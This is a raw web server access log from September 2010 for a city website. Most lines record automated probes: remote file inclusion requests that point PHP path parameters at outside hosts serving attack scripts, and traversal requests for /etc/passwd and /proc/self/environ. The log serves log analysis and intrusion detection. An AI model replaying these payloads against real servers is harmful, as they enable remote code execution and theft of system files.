204.188.241.2 - - [01/Sep/2010:03:12:40 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [01/Sep/2010:03:14:12 -0700] "GET /logs/access_100329.log//agendax/addevent.inc.php?agendax_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [01/Sep/2010:03:31:22 -0700] "GET /index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [01/Sep/2010:03:31:22 -0700] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [01/Sep/2010:03:31:22 -0700] "GET /logs/access_091201.log//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [01/Sep/2010:03:34:12 -0700] "GET /logs/access_100201.log//config/dbutil.bck.php?confdir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [01/Sep/2010:03:34:12 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [01/Sep/2010:03:34:13 -0700] "GET /config/dbutil.bck.php?confdir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
207.46.204.188 - - [01/Sep/2010:03:34:52 -0700] "GET /Downloads/ HTTP/1.1" 200 671 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "cityofarkadelphia.com"
186.28.232.13 - - [01/Sep/2010:03:41:51 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://sentrol.cl/components/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
186.28.232.13 - - [01/Sep/2010:03:41:51 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://sentrol.cl/components/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
118.129.166.221 - - [01/Sep/2010:03:43:27 -0700] "GET /logs///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kwiketa-skwirk.com/images/bobrok1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
118.129.166.221 - - [01/Sep/2010:03:43:27 -0700] "GET /logs/access_091201.log///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kwiketa-skwirk.com/images/bobrok1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
118.129.166.221 - - [01/Sep/2010:03:43:32 -0700] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kwiketa-skwirk.com/images/bobrok1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
118.129.166.221 - - [01/Sep/2010:03:43:32 -0700] "GET /logs///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kwiketa-skwirk.com/images/bobrok1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
118.129.166.221 - - [01/Sep/2010:03:43:32 -0700] "GET /logs/access_091201.log///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kwiketa-skwirk.com/images/bobrok1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
118.129.166.221 - - [01/Sep/2010:03:43:32 -0700] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kwiketa-skwirk.com/images/bobrok1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
118.129.166.221 - - [01/Sep/2010:03:43:35 -0700] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kwiketa-skwirk.com/images/bobrok1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
118.129.166.221 - - [01/Sep/2010:03:43:35 -0700] "GET /logs/access_091201.log///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kwiketa-skwirk.com/images/bobrok1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
118.129.166.221 - - [01/Sep/2010:03:43:45 -0700] "GET /logs///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kwiketa-skwirk.com/images/bobrok1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
118.129.166.221 - - [01/Sep/2010:03:44:40 -0700] "GET /logs///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kwiketa-skwirk.com/images/bobrok1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
118.129.166.221 - - [01/Sep/2010:03:44:40 -0700] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kwiketa-skwirk.com/images/bobrok1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
118.129.166.221 - - [01/Sep/2010:03:44:50 -0700] "GET /logs/access_100201.log%20%20///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kwiketa-skwirk.com/images/bobrok1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
118.129.166.221 - - [01/Sep/2010:03:44:55 -0700] "GET /logs/access_091031.log%20%20///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kwiketa-skwirk.com/images/bobrok1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
118.129.166.221 - - [01/Sep/2010:03:47:33 -0700] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kwiketa-skwirk.com/images/bobrok1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
118.129.166.221 - - [01/Sep/2010:03:47:33 -0700] "GET /logs///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kwiketa-skwirk.com/images/bobrok1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
118.129.166.221 - - [01/Sep/2010:03:47:33 -0700] "GET /logs/access_100201.log%20%20///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kwiketa-skwirk.com/images/bobrok1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
118.129.166.221 - - [01/Sep/2010:03:47:49 -0700] "GET /logs/access_091031.log%20%20///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kwiketa-skwirk.com/images/bobrok1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
118.129.166.221 - - [01/Sep/2010:03:48:16 -0700] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kwiketa-skwirk.com/images/bobrok1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
118.129.166.221 - - [01/Sep/2010:03:48:16 -0700] "GET /logs///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kwiketa-skwirk.com/images/bobrok1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
118.129.166.221 - - [01/Sep/2010:03:48:16 -0700] "GET /logs/access_100201.log%20%20///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kwiketa-skwirk.com/images/bobrok1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
118.129.166.221 - - [01/Sep/2010:03:48:26 -0700] "GET /logs/access_091031.log%20%20///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kwiketa-skwirk.com/images/bobrok1.jpg??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [01/Sep/2010:03:53:27 -0700] "GET /logs/access_100330.log//config/dbutil.bck.php?confdir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [01/Sep/2010:03:54:28 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [01/Sep/2010:03:54:28 -0700] "GET /logs/access_091201.log//?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [01/Sep/2010:03:54:28 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 4089 "-" "Mozilla/5.0" "cityofarkadelphia.com"
207.46.195.234 - - [01/Sep/2010:04:00:03 -0700] "GET / HTTP/1.1" 200 917 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "cityofarkadelphia.com"
222.236.47.182 - - [01/Sep/2010:04:01:36 -0700] "GET /logs/access_100401.log//config/dbutil.bck.php?confdir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.149.233.199 - - [01/Sep/2010:04:07:14 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "cityofarkadelphia.com"
184.72.20.195 - - [01/Sep/2010:04:08:31 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Chen Li/Nutch-1.0 (Nutch spiderman; http://chenli.com.cn; chenlibiti@163.com)" "cityofarkadelphia.com"
184.72.20.195 - - [01/Sep/2010:04:08:33 -0700] "GET /logs/access_100201.log HTTP/1.0" 200 786432 "-" "Chen Li/Nutch-1.0 (Nutch spiderman; http://chenli.com.cn; chenlibiti@163.com)" "cityofarkadelphia.com"
195.3.137.234 - - [01/Sep/2010:04:15:45 -0700] "GET /logs/index.php?option=com_remository&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.3.137.234 - - [01/Sep/2010:04:15:45 -0700] "GET /logs/index.php?option=com_remository&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.3.137.234 - - [01/Sep/2010:04:15:45 -0700] "GET /index.php?option=com_remository&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.3.137.234 - - [01/Sep/2010:04:15:45 -0700] "GET /index.php?option=com_remository&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.108.64.232 - - [01/Sep/2010:04:16:36 -0700] "GET /logs/access_091231.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "cityofarkadelphia.com"
89.108.64.232 - - [01/Sep/2010:04:16:37 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "cityofarkadelphia.com"
89.108.64.232 - - [01/Sep/2010:04:16:37 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "cityofarkadelphia.com"
208.91.57.65 - - [01/Sep/2010:04:18:36 -0700] "GET /index.php?option=com_extcalendar&mosConfig.absolute.path=http://www.hanhaho.com/bbs/data/board04/1246476516/clx.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "cityofarkadelphia.com"
193.169.188.61 - - [01/Sep/2010:04:18:47 -0700] "GET /index.php?option=com_extcalendar&mosConfig.absolute.path=http://www.hanhaho.com/bbs/data/board04/1246476516/clx.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "cityofarkadelphia.com"
89.108.64.232 - - [01/Sep/2010:04:19:14 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "cityofarkadelphia.com"
195.3.137.234 - - [01/Sep/2010:04:21:21 -0700] "GET /logs/index.php?option=com_remository&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.3.137.234 - - [01/Sep/2010:04:21:21 -0700] "GET /index.php?option=com_remository&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
88.255.117.114 - - [01/Sep/2010:04:21:53 -0700] "GET /index.php?option=com_extcalendar&mosConfig.absolute.path=http://www.hanhaho.com/bbs/data/board04/1246476516/clx.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
222.236.47.182 - - [01/Sep/2010:04:23:25 -0700] "GET /logs/access_091031.log%20%20//config/dbutil.bck.php?confdir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [01/Sep/2010:04:24:01 -0700] "GET /logs/access_100201.log%20%20//config/dbutil.bck.php?confdir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
193.169.188.61 - - [01/Sep/2010:04:36:59 -0700] "GET /logs/access_091031.log//index.php?option=com_extcalendar&mosConfig.absolute.path=http://www.hanhaho.com/bbs/data/board04/1246476516/clx.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "cityofarkadelphia.com"
193.169.188.61 - - [01/Sep/2010:04:36:59 -0700] "GET /index.php?option=com_extcalendar&mosConfig.absolute.path=http://www.hanhaho.com/bbs/data/board04/1246476516/clx.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "cityofarkadelphia.com"
193.169.188.61 - - [01/Sep/2010:04:36:59 -0700] "GET /logs//index.php?option=com_extcalendar&mosConfig.absolute.path=http://www.hanhaho.com/bbs/data/board04/1246476516/clx.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "cityofarkadelphia.com"
67.23.235.91 - - [01/Sep/2010:04:37:59 -0700] "GET /logs//delete_all.php?board_skin_path=http://situs-wanita.com/s??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
67.23.235.91 - - [01/Sep/2010:04:37:59 -0700] "GET /logs//delete_all.php?board_skin_path=http://situs-wanita.com/s??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
67.23.235.91 - - [01/Sep/2010:04:37:59 -0700] "GET /logs/access_091201.log//delete_all.php?board_skin_path=http://situs-wanita.com/s??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
67.23.235.91 - - [01/Sep/2010:04:37:59 -0700] "GET /logs/access_091201.log//delete_all.php?board_skin_path=http://situs-wanita.com/s??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
67.23.235.91 - - [01/Sep/2010:04:37:59 -0700] "GET /delete_all.php?board_skin_path=http://situs-wanita.com/s??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
67.23.235.91 - - [01/Sep/2010:04:37:59 -0700] "GET /delete_all.php?board_skin_path=http://situs-wanita.com/s??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
196.44.33.187 - - [01/Sep/2010:04:39:02 -0700] "GET /logs/access_091031.log%20%20//index.php?option=com_extcalendar&mosConfig.absolute.path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
196.44.33.187 - - [01/Sep/2010:04:39:02 -0700] "GET /logs//index.php?option=com_extcalendar&mosConfig.absolute.path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
196.44.33.187 - - [01/Sep/2010:04:39:02 -0700] "GET /index.php?option=com_extcalendar&mosConfig.absolute.path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
208.91.57.65 - - [01/Sep/2010:04:39:19 -0700] "GET /logs/access_091031.log//index.php?option=com_extcalendar&mosConfig.absolute.path=http://www.hanhaho.com/bbs/data/board04/1246476516/clx.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "cityofarkadelphia.com"
208.91.57.65 - - [01/Sep/2010:04:39:20 -0700] "GET /index.php?option=com_extcalendar&mosConfig.absolute.path=http://www.hanhaho.com/bbs/data/board04/1246476516/clx.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "cityofarkadelphia.com"
208.91.57.65 - - [01/Sep/2010:04:39:20 -0700] "GET /logs//index.php?option=com_extcalendar&mosConfig.absolute.path=http://www.hanhaho.com/bbs/data/board04/1246476516/clx.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "cityofarkadelphia.com"
62.149.233.199 - - [01/Sep/2010:04:44:29 -0700] "POST /logs/access_100201.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "cityofarkadelphia.com"
62.149.233.199 - - [01/Sep/2010:04:44:37 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "cityofarkadelphia.com"
62.149.233.199 - - [01/Sep/2010:04:46:23 -0700] "POST /logs/access.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "cityofarkadelphia.com"
88.255.117.114 - - [01/Sep/2010:04:52:18 -0700] "GET /logs/access_091031.log//index.php?option=com_extcalendar&mosConfig.absolute.path=http://www.hanhaho.com/bbs/data/board04/1246476516/clx.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
88.255.117.114 - - [01/Sep/2010:04:52:19 -0700] "GET /index.php?option=com_extcalendar&mosConfig.absolute.path=http://www.hanhaho.com/bbs/data/board04/1246476516/clx.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
88.255.117.114 - - [01/Sep/2010:04:52:19 -0700] "GET /logs//index.php?option=com_extcalendar&mosConfig.absolute.path=http://www.hanhaho.com/bbs/data/board04/1246476516/clx.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
66.173.240.217 - - [01/Sep/2010:05:04:49 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.173.240.217 - - [01/Sep/2010:05:04:49 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.173.240.217 - - [01/Sep/2010:05:04:50 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "cityofarkadelphia.com"
200.29.171.35 - - [01/Sep/2010:05:09:50 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://60gp.ovh.net/~wielgoml/images/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
200.29.171.35 - - [01/Sep/2010:05:10:11 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://60gp.ovh.net/~wielgoml/images/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
222.236.47.182 - - [01/Sep/2010:05:10:27 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [01/Sep/2010:05:10:27 -0700] "GET /logs/access.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [01/Sep/2010:05:10:28 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [01/Sep/2010:05:11:40 -0700] "GET /logs/access_100201.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.29.171.35 - - [01/Sep/2010:05:25:22 -0700] "GET /logs/access_091201.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://60gp.ovh.net/~wielgoml/images/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
118.96.137.105 - - [01/Sep/2010:05:27:30 -0700] "GET /logs/access_091201.log HTTP/1.1" 200 3374242 "http://www.google.co.id/search?hl=id&source=hp&q=modules%2Fpostguestbook%2Fstyles%2Finternal%2Fheader.php%3Ftpl_pgb_moddir%3D&btnG=Penelusuran+Google" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6" "cityofarkadelphia.com"
118.96.137.105 - - [01/Sep/2010:05:28:08 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6" "cityofarkadelphia.com"
118.96.137.105 - - [01/Sep/2010:05:39:21 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6" "cityofarkadelphia.com"
118.96.137.105 - - [01/Sep/2010:05:39:35 -0700] "GET /logs/ HTTP/1.1" 200 4084 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6" "cityofarkadelphia.com"
118.96.137.105 - - [01/Sep/2010:05:39:52 -0700] "GET / HTTP/1.1" 200 917 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6" "cityofarkadelphia.com"
118.96.137.105 - - [01/Sep/2010:05:39:57 -0700] "GET /Downloads/ HTTP/1.1" 200 671 "http://cityofarkadelphia.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6" "cityofarkadelphia.com"
118.96.137.105 - - [01/Sep/2010:05:40:06 -0700] "GET /tmp/ HTTP/1.1" 200 520 "http://cityofarkadelphia.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6" "cityofarkadelphia.com"
118.96.137.105 - - [01/Sep/2010:05:40:16 -0700] "GET / HTTP/1.1" 200 917 "http://cityofarkadelphia.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6" "cityofarkadelphia.com"
118.96.137.105 - - [01/Sep/2010:05:40:26 -0700] "GET /Downloads/ HTTP/1.1" 200 671 "http://cityofarkadelphia.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6" "cityofarkadelphia.com"
118.96.137.105 - - [01/Sep/2010:05:40:31 -0700] "GET /logs/ HTTP/1.1" 200 4084 "http://cityofarkadelphia.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6" "cityofarkadelphia.com"
222.236.47.182 - - [01/Sep/2010:05:51:41 -0700] "GET /logs/access_091031.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [01/Sep/2010:05:51:41 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 4089 "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [01/Sep/2010:05:51:41 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "cityofarkadelphia.com"
217.26.112.1 - - [01/Sep/2010:06:05:00 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "cityofarkadelphia.com"
217.26.112.1 - - [01/Sep/2010:06:05:00 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "cityofarkadelphia.com"
213.171.37.206 - - [01/Sep/2010:06:37:12 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "cityofarkadelphia.com"
213.171.37.206 - - [01/Sep/2010:06:37:12 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "cityofarkadelphia.com"
213.185.128.150 - - [01/Sep/2010:06:40:39 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "cityofarkadelphia.com"
213.185.128.150 - - [01/Sep/2010:06:40:44 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.71.254.10 - - [01/Sep/2010:06:40:51 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://bye515.zoomshare.com/files/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "cityofarkadelphia.com"
